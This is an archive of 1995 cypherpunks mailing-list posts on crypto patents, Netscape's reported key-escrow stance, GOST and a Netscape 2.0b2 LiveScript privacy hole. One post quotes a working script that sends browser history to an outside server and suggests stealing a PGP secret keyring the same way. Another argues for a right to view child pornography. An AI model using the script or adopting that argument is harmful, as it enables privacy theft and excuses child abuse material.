continue, new or hidden challenges will arise. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 23 Nov 95 06:32:25 PST
To: raph@c2.org
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
Message-ID: <199511231334.OAA00460@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>    Ok. But public keys have one serious disadvantage: their size. I can't 
> put a public key on my business card or read it over the phone. I want a 
> unforgeable key name. I want this to be the standard key name in the 
> interface between the application and the crypto engine. I want users to 
> be able to specify them directly, at the very least to bootstrap the 
> public key infrastructure.

There is a patent by someone (I think it was IBM) on how to pack RSA
keys in small space.  I think they were putting them on the magnetic
strips that you have behind every card.  I'm afraid I don't have the
patent number saved, but I have seen the patent document myself at the
patent office.  No, I'm afraid I don't remember how they encoded it.

Using that method (or something similar), you could probably encode
the keys into acceptably short strings with S/KEY-style encoding.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Fri, 24 Nov 95 18:56:59 PST
To: moroni@scranton.com
Subject: Re: crypto for porno users
Message-ID: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: IN%"moroni@scranton.com"  "Moroni" 24-NOV-1995 14:52:11.13

>I wish we could get off the subject of the kiddie porn , it makes
>me wonder what people on this list are doing when they are not
>mailing out letters. Not to flame ,BUT it is such a serious issue
>and we all as adults and approaching adults should not treat it as
>an academic issue . It is the most victimizing of all crimes and
>I think of speak for some of us when I say that it would be better
>if we all found a way to get back to discussing the problems of
>cryptography as related to we not pornographers.

     I can see one argument that one should not discuss such
unpopular topics. That argument is that the person who brought them
up may act as a (hopefully inadvertent) _agent provocateur_ for
those who would condemn cryptography for protecting child
pornography and similarly unaccepted practices. However, I regard
self-censorship in reaction to fears of government as as evil as
governmental censorship. Consequently, I would like to give two
counterarguments to the idea that child pornography is not
something that should be cryptographically protected.
     The first is that one may legitimately disagree with the
government on what is child pornography. For instance, one may
disagree on what minimum age should be used. Governments are known
for being quite incoherent on rules on sexuality and the age of
consent. For instance, Britain's age for consent depends on the
type of sexuality involved; heterosexual sex receives a more
lenient age (18) than homosexual (21). (There are also, of course,
difficulties caused by such legal inconsistencies as simultaneously
deeming someone not to be of consenting age for sex yet to be
considered an adult when charged with murder; I refer to the
infamous Bobbit (sp?) trials).
     The second is that given new image modification technologies,
it is possible to produce what will seem child pornography, but
with no actual harm done to children. In some ways, this product
may reduce harm to children in some respects by providing a
"competing product" to actual child pornography, and thus
discourage its manufacture. Some will argue that such simulated
child pornography is useful by pedophiles in persuading children;
this argument appears similar to the one against cryptography that
it can be used for purposes generally agreed to be illegitimate. I
trust that the list does not find such an argument to be valid. I
will mention in this regard that I have no personal want to see
child pornography. However, I support the right of those who do to
do so, if no harm to others is committed.
     Sincerely Yours,
     -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Wed, 29 Nov 95 05:10:29 PST
To: jamesd@echeque.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511291310.NAA27164@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995 23:16:10 -0800 jamesd@echeque.com wrote:

>At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>>
>> I'm unclear about the patent status of elliptic curve 
>> systems. Are they covered by the Diffie-Hellman patent? 
>> That is, is the lnguage of this patent broad enough to 
>> cover _all_ public-key systems, regardless of their 
>> mathematical basis? 
>
>No, but RSA will litigate you with the objective of
>inflicting extravagant legal costs regardless.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Wed, 29 Nov 95 05:11:55 PST
To: jamesd@echeque.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511291311.NAA21044@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995 23:16:10 -0800 jamesd@echeque.com wrote:

>At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>>
>> I'm unclear about the patent status of elliptic curve 
>> systems. Are they covered by the Diffie-Hellman patent? 
>> That is, is the lnguage of this patent broad enough to 
>> cover _all_ public-key systems, regardless of their 
>> mathematical basis? 
>
>No, but RSA will litigate you with the objective of
>inflicting extravagant legal costs regardless.

Does the patent create any headaches for elliptic curve research or
publishing elliptic curve papers, or just for new products?
						Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 08:55:52 PST
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511301654.IAA26162@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 AM 11/30/95 -0800, Jeff Weinstein wrote:
> All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes. 

Then we would like to hear Jim "clarify" his position.

Absent such clarification, we must assume he considers the
press reports of what he said to be reasonably accurate.

>  I don't want to go down in history as a facilitator of the totalitarian
> state, and I don't think anyone else here does either. 

Most of the major players have taken a position overtly opposed to
GAK (whilst leaving themselves some wriggle room, should
the heat get too severe).

What is netscape's position?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 09:00:47 PST
To: "Bob Bruen, MIT Lab for Nuclear Science" <cypherpunks@toad.com
Subject: Re: cypherpunks at ietf
Message-ID: <199511301700.JAA29522@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE
> SEARCH ON THE WEB.
>
> [...]
>
> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.

Gee:  Someone who has not learnt to use the caps key on his computer
cannot do accurate searches, so will everyone else please get off
the net.

>
> [...]
>
> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
> PLACING ON THE WEB.

Pleasant comic relief.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Wed, 29 Nov 95 04:09:06 PST
To: Bill Stewart <cypherpunks@toad.com>
Subject: Re: GOST for sale
Message-ID: <199511291310.HAA00198@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995 11:53:26 -0800, you wrote:

>At 03:43 AM 11/24/95 +0100, Mats Bergstrom <asgaard@sos.sll.se> wrote:
>>According to a short article in a Swedish newspaper (DN)
>>with the title 'Spy Code of KGB can make computers safe', 
>>JETICO INC., located in Finland (Tammerfors), introduced
>>a new crypto system on the world market last week. It's 
>>based on GOST, the Russian federal standard algorithm.

[..]
>From what I've read of GOST, it's really a family of cyphers with
>different sets of S-boxes - routine military gets one set, top secret
>gets another, civilian govt another, etc.  Aside from possible
>differences in security level for the S-boxes, one motivation is
>that you can't take civilian govt decryptors and use them to read
>or forge top secret military crypto, etc.  If this is correct,
>then some sets of S-boxes probably do have trapdoors (at least
>susceptibility to differential cryptanalysis_; how good are the
>ones that Jetico is selling, what credentials do they have to
>convince us their cryptanalysis is good enough, and why are they
>doing parts of it in hardware?

Based on the few articles I've read, S-Boxes are generated randomly,
or (doubtful in this case) generated from the passphrase, making an
even larger keyspace.

--Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 21:19:23 PST
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: The future will be easy to use
Message-ID: <199512010519.VAA12881@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>On Tue, 28 Nov 1995, James A. Donald wrote:
>> This argument makes no sense at all:  I am going to attack my
>> enemies by paying people to send books, computers, and stuff
>> to them?

At 12:39 PM 11/30/95 -0500, Jon Lasser wrote:
>No; you're going to steal from your enemies by having them ship things to 
>you without payment.

Why would I bother to use encryption to encrypt someone elses credit
card number?  This is like arguing that I could use a crypto book
to hit someone over the head with in order to steal their wallet,
or arguing that a firewalled computer can still be attacked with
a sledge hammer.  Irrelevant.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 21:49:11 PST
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <199512010549.VAA27849@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:08 PM 11/30/95 -0500, hallam@w3.org wrote:
>
> Folks, lay of Netscape on this one. [...]
> 
> It is the idea that individuals be forced to 
> use it for private conversations that is the bad idea.

Jim Clark advocated Governemnt Access to Keys:  GAK.  He
did not advocate voluntary escrow -- very few people
object to voluntary escrow.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 95 21:49:15 PST
To: Frank Stuart <cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010549.VAA27874@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> I'm working on an "obnoxify" program to convert 
> normal html documents into documents that look 
> normal to non-netscape browsers, but are too painful to
> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  
> I think tomorrow evening would be a good time to decide 
> whether or not to distribute it.

Is there any way one could set up a dirty pictures web
page in such a fashion that it would be difficult, painful,
and impractical to get at the pictures through that page
with a netscape browser?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 30 Nov 95 01:00:08 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <30BD716E.5F69@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
> http://www.cnet.com/Central/News/govt.html
> 
>         Bad. Very Bad. And I was almost starting to like Netscape.

  Please don't give up on us yet.  All press accounts I've read so far
have lots of stuff attributed to Jim, but very little of it is actual
quotes.  There appears to be lots of paraphrasing and interpretation
being done on the part of the reporters.  The impression that I'm
getting is that the press has blown a couple of small sound bites
way out of proportion.  The infoworld article that covers the same
speech only devotes about 20% of the article to the key escrow topic,
and is similarly devoid of actual quotes.

  I have not spoken to Jim about this, and I did not hear the talk
myself, so I'm mostly reading between the lines here.  After I saw the
story earlier today I started asking around to see if the company
had made any major policy shift in the direction of GAK, and wasn't
able to turn up anything.  If anything its the opposite.

  My feelings about key escrow, which were echo'd by several folks
in management when I spoke to them today are:

	o Government mandated escrow would be a bad thing
	o There are some settings where escrow is good, in the corporate
		setting, or as a matter of person choice(to protect against
		loss of password)
	o The whole issue of escrow should be de-coupled from the
		export issue

  I don't want to go down in history as a facilitator of the totalitarian
state, and I don't think anyone else here does either.  I hope folks
wait for press releases, product announcements, etc. before condemning us
too much.  Jim has made comments in the past that were quoted out of
context, and blown way out of proportion to the point that some people
believed that we were monitoring our user's every keystroke and sending
it all back to the home office to generate huge demographic databases.
I suspect that this is the same sort of thing, and I hope everyone will
judge us by what we do.

	--Jeff

PS - you won't find a LEF in the soon to be released SSL Version 3 spec...

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Thu, 30 Nov 95 08:55:17 PST
To: sameer <sameer@c2.org>
Subject: "Got a subpoena?"
In-Reply-To: <199511301606.IAA17493@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951130113015.132b-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, sameer wrote:

> 	Community ConneXion will comply with all properly formed court
> orders and subpeonas. We will *not* cooperate without court
> intervention. (I.e. Mr. FBI calls up and says "can you help us find
> this suspect"? I respond "got a subpoena?")

But it's not quite that simple, Sameer.  Don't underestimate the more
subtle forms of non-cooperation you can engage in.

To use the most obvious example, different remailer operators turn
different levels of logging on.  So one operator will say "Yes, I am
obligated to fully comply with your subpoena, officer.  Here are the
full logs for the last six months."  And another will say "Yes, I am
obligated to fully comply with your subpoena, officer.  However, I
keep no logs at all of the mail sent through my remailer.  Drag, huh?"

Being the eternal pessimist, I once again point out that the
government will try to stop cryptoanarchy any way they can.  Their
main tool is the law, and they WILL use it eventually when all else
fails.  Personally, I would play it safe by operating on the
assumption that basically EVERYTHING will be illegal eventually and
"finessing" laws will become more important.  In short, they WILL have
a subpoena--then what?

Of course, I personally would never do anything illegal.

   --Dave.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 30 Nov 95 21:55:38 PST
To: graeme@chem2.chem.swin.edu.au (Graeme Cross)
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <199512010549.VAA18386@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I knew livescript was nasty...

> 
> 
> Talking of Netscape - this posting prompted me to forward it given the 
> security and privacy implications inherent in the problem.
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Sun, 3 Dec 95 09:59:20 PST
To: cypherpunks@toad.com
Subject: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Message-ID: <199512010610.BAA15528@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Just got this and found it interesting.  You may have seen it 
already...published in today's issue of Investor's Business Daily.

INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Fear of Internet crime is well-founded among businesses whose corporate
networks may be compromised by curious hackers or malicious crackers, but
"By and large, consumers have very little risk using and doing business on
the Internet," says the chairman of Open Market Inc.  While it is possible
to break an encryption code and crack a secured phone line to discover an
individual's credit card number, it's much easier to copy them off of
discarded carbons.  "If someone wanted to steal a credit card number, all
they would have to do is go to any gas station and look on the ground
around the pumps," says the CTO at Internet security firm Terisa Systems. 
(Investor's Business Daily 30 Nov 95 A8)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: OpsAn@gnn.com (Michael Coates)
Date: Thu, 30 Nov 95 22:12:51 PST
To: cypherpunks@toad.com
Subject: AUTHOR A VIRUS, GO TO JAIL
Message-ID: <199512010612.BAA13976@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Found this intersting too.  US Position?

AUTHOR A VIRUS, GO TO JAIL
A computer cracker last week became the first virus writer sentenced to a
jail term under Great Britain's Computer Misuse Act.  The 26-year-old
perpetrator was sentenced to 18 months in jail after pleading guilty to 11
charges connected with placing virus-infected programs on computer bulletin
boards.  (Investor's Business Daily 29 Nov 95 A6)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 1 Dec 1995 16:24:59 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
Message-ID: <ace466400202100414f2@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:52 PM 12/28/95, Graeme Cross wrote:
>Talking of Netscape - this posting prompted me to forward it given the
>security and privacy implications inherent in the problem.
>
>Cheers
>Graeme
>
<SNIP>

YOW! It is beginning to look like "At Netscape, Security is Job NONE."

Something to put with the Netscape pro-GAK pages I am putting together.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 3 Dec 1995 00:24:34 +0800
To: cypherpunks@toad.com
Subject: Barring access to Netscape
Message-ID: <199512010738.BAA17804@khijol>
MIME-Version: 1.0
Content-Type: text/plain


If you want to bar access to your site from a Netscape browser, such 
can easily be accomplished.  If memory serves, every browser, when 
connecting to a site, exchanges certain information about the client 
with the server.  One can gain access easily to that information.

I believe that Netscape uses "Mozilla" as their keyword when 
exchanging browser-specific information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Fri, 1 Dec 1995 15:43:46 +0800
To: Frank Stuart <loki@obscura.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010744.BAA18327@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 30 Nov 1995 21:43:57 -0600 (CST)
> From:          Frank Stuart <fstuart@vetmed.auburn.edu>
> To:            loki@obscura.com, cypherpunks@toad.com
> Subject:       Re: Getting a copy of the Jim Clark speech

> >If he has not clarified his position by tomorrow evening, I will set up some
> >web pages explaining the situation and decrying Netscape's apparent
> >position on key escrow (GAK). I have the quotes that L. McCarthy posted,
> >and Jeff Weinstein's response. I have not been able to get the article off
> >the server yet (possible all the cypherpunks downloading it?). Any other
> >documents I should include?
> 
> I'm working on an "obnoxify" program to convert normal html documents into
> documents that look normal to non-netscape browsers, but are too painful to
> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  I think tomorrow evening
> would be a good time to decide whether or not to distribute it.

The only problem with this approach is that this will bite other 
browsers that have started supporting the so-called "Netscape 
extensions".  More than one person has coded the Netscape stuff into 
their pages because it gives the author more flexibility than the 
standard 1.0/2.0 standards.  And there aren't many browsers out there 
yet that support 3.0.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 3 Dec 1995 00:27:17 +0800
To: Matt Miszewski <crypto@midex.com>
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512010750.BAA18796@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 1 Dec 1995 04:40:23 -36000
> From:          Matt Miszewski <crypto@midex.com>
> Subject:       Re: Netscape gives in to key escrow
> To:            sameer <sameer@c2.org>
> Cc:            Jeff Weinstein <jsw@netscape.com>, cypherpunks@toad.com,
>                jsw@tera.netscape.com

> On Thu, 30 Nov 1995, sameer wrote:
> 
> > 	Jeff: If Netscape comes out in favor of GAK, will you leave?
> > (Wait until February, at least, of course..) You don't have to answer
> > that to me, or the list, just think about it, and answer it for
> > yourself.  Do you think "anyone else" there would leave, as you say
> > below that they don't want to go down history, etc...
> > 
> 
> While this would go over well in the press if handled right please let 
> everyone remember that Jeff is a real person with bills to pay and food 
> to put on at least his own table.  Now if someone out there with their 
> own business is willing to match his politics with his purse and offer 
> Jeff a job at the same level if he *decides* to leave in the midst of GAK 
> flak...

If Jeff decided to leave, I don't think he'd have much trouble 
getting something else - I'd be surprised if he wasn't employed the 
next day.

Of course, if Jeff's got any stock in Netscape, he'd be nuts to leave 
- unless he values his principles more than he values his stock.  No 
insult intended.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 1 Dec 1995 16:59:25 +0800
To: Ed Carp <ecarp@netcom.com>
Subject: Re: Barring access to Netscape
In-Reply-To: <199512010738.BAA17804@khijol>
Message-ID: <Pine.SOL.3.91.951201002746.2186B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Ed Carp wrote:

> I believe that Netscape uses "Mozilla" as their keyword when 
> exchanging browser-specific information.

The field is User-Agent. However, blocking access to users of Navigator 
isn't a particularly useful thing to do. If you must do something, why 
not modify your GET handler to add a header to the start of all html 
pages informing people of the problem, and suggesting alternatives. 

Someone else [I can't remember, but I'll call them Alice] claimed that the
security problems showing up were part of a deliberate conspiracy.  To
anyone who knows anything about the history of these things knows how
absurd this is. The principals at Netscape are a nice bunch of really
guys, but were not really up to speed on issues like security and
networking- for example, the first incarnation of SSL had an RC4 stream
running with no checksumming whatsoever. The security problems that
resulted are due to the learning curve.

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Dec 1995 14:20:08 +0800
To: graeme@chem2.chem.swin.edu.au (Graeme Cross)
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <199512010605.BAA18775@homeport.org>
MIME-Version: 1.0
Content-Type: text


	About a month ago, I made the argument that Java, despite its
imperfections, is much better than most things we'll see.  I stand by
this argument, and urge Netscape to use only Java* as a scripting
language.

	*By Java, I mean the class of languages designed with security
in mind.  I think that means Java and Safe-TCL.  Taint-perl is not
useful; its designed for unsafe input from a user, not unsafe code.

	People with time to hack netscape might experiment with
location.href = "file://.pgp/secring.pgp" and see if you can write a
script to export it somewhere.

And here's how its done.  Hitting the page makes your history public
knowledge.  (Btw, Bal, is Netbsd1.1 stable yet? :)

scott@tripleg.com.au wrote this code:

<SCRIPT LANGUAGE="LiveScript">

<!--
  i = 0
  yourHistory = ""
  while (i < history.length) { 
    yourHistory += history[i]
    i++;
    if (i < history.length) yourHistory += "^"
  }
  location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?"+yourHistory
<!-- hahah here is the hidden script -->


Graeme Cross wrote:
| >From: Scott Weston <scott@tripleg.com.au>
| >The "LiveScript" that I wrote extracts ALL the history of the current
| >netscape window.  By history I mean ALL the pages that you have visited
| >to get to my page, it then generates a string of these and forces the
| >Netscape client to load a URL that is a CGI script with the QUERY_STRING
| >set to the users History.  The CGI script then adds this information
| >to a log file.  Now if this hasn't quite CLICKED yet lets do a little
| >example.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markson@osmosys.incog.com (Tom Markson)
Date: Sat, 2 Dec 1995 23:56:39 +0800
To: cypherpunks@toad.com
Subject: re: SKIP source release is out
In-Reply-To: <199511301758.JAA08943@bullterrier.incog.com>
Message-ID: <9512010919.AA29567@monster.incog.com>
MIME-Version: 1.0
Content-Type: text/plain


> Doug Hughes writes:
[ Perry Metzger writes: ]
> > >SKIP is a non-standard being pushed by Sun.
> >
> > Correct me if I'm wrong, but isn't sun trying to make it a standard
> > (in competetion with Photuris) ?

Doug, you are correct.  SKIP is an IPSEC internet draft.  Photuris is
an IPSEC internet draft.  Perry is incorrect in saying that SKIP is 
a non-standard.   Both of the chairs of the IPSEC group have said SKIP 
is part of the IPSEC working group.   Phil Karn (author of Photuris)
has also said this.  Both SKIP and Photuris are on the standards track.
They are, as you indicated, "competing" protocols.

> The IETF has many sorts of standards. It explicitly has a way to
> standardize things that the IETF doesn't think are a good idea but
> which should have the ability to interoperate if you do them.

That's true, but SKIP is not in that category.    I believe neither SKIP
nor Photuris have been declared "mandatory" as of this point.  They both
have the same status in IPSEC.  

> My opinion is that it is fairly clear that Photuris is the key
> management system people will be using, although it is going to have
> to evolve to work with a real network wide certificate database
> infrastructure. SKIP isn't going to be the standard.

Again, in *your* opinion.  No determination has been made that I know of.

--tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Sun, 3 Dec 1995 00:24:51 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <199512010605.BAA18775@homeport.org>
Message-ID: <9512010651.AA21856@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: Adam Shostack <adam@lighthouse.homeport.org>
   Date: Fri, 1 Dec 1995 01:05:49 -0500 (EST)
   Cc: cypherpunks@toad.com
   X-Mailer: ELM [version 2.4 PL24 ME8b]
   Content-Type: text
   Content-Length: 1647      
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   (Btw, Bal, is Netbsd1.1 stable yet? :)

Seems stable enough to me, although I've only been running 1.1 since the
official release a couple of days ago.  I was able to trigger Scott
Westin's LiveScript with a Linux Netscape binary in 1.1's Linux
compatibility mode.  That's stable enough for me.

Oh, and PGP 2.6.2 built right out of the box :-)

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 1 Dec 1995 18:48:29 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <30BED7A6.623B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> 
> [As seen on the cypherpunks list]
> 
> I just confirmed this for Mozilla/2.0b3 (Win95; I). I also see an entry
> from the Mac version of 2.0b3. No need for anyone else to test it.

  Sorry Rich, you must be mistaken.  All of the beta 3 entries had
empty history.  This problem was fixed in beta 3.

> Very nasty indeed. To what other variables might someone have access?

  We will be reviewing everything that is reflected into livescript
before the final 2.0 release.  All of this stuff will also be
documented so that you all can review it looking for anything
dangerous.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 1 Dec 1995 18:49:36 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To: <Pine.SGI.3.90.951201155131.15809A-100000@chem2.chem.swin.edu.au>
Message-ID: <30BED8E9.16FC@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


This problem was found a few weeks ago and we fixed it immediately.
You all can see the fix in Beta 3, which does not reflect the
history strings into livescript.  As soon as I heard of the problem
I insisted that it be fixed right away.  I also had a fairly extensive
discussion with the creator of livescript about what other things
might be dangerous.  We didn't come up with anything, but will be
doing a security review of livescript before the final 2.0 release
just to make sure.

	--Jeff
  
-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 1 Dec 1995 19:02:19 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <m0tHeeN-0008zTC@pacifier.com>
Message-ID: <30BEDBF4.483A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> >On September 27, Jeff Weinstein of Netscape (and others) wrote:
> >
> >> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> >> > > hint).
> >> >
> >> > We are working this issue with the government.  As soon as we can
> >> > make it available for download we will.
> >
> >> In other words, we will never see it in our lifetimes -- the
> >> bureaucreeps aren't known for promoting the spread of strong crypto.
> >
> >>>  Where did I imply that if the govt. ignored us or said no that we
> >>>  would meekly go away with tail between legs?
> 
> Here's a question:  Why can't Netscape be released WITHIN THE US with 128
> bit keys?  Admittedly, it would probably...uh...escape within a few hours,
> but that's no worse than what other cryptosystems (best-known example, PGP)
> have done.

  It is.  You can buy if from our home page, or from most computer
stores.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
